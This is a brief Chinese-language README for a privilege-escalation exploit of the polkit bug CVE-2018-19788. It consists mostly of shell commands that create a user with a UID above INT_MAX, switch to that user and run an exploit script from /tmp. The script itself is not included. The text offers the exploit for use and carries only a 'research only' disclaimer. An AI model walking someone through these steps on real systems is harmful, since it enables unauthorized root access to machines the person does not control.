CVE-2018-19788 的超级简单利用
要使用此工具,您必须在 Policy Kit 中创建一个 UID > INT_MAX 的用户,或者已经拥有一个具有该 UID 的低权限用户。
UID 可以在创建用户时指定,如下所示,然后在执行脚本前使用:
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
请注意,这仅用于研究,您需自行对使用本仓库或其他任何仓库中的任何代码负责,常识如此。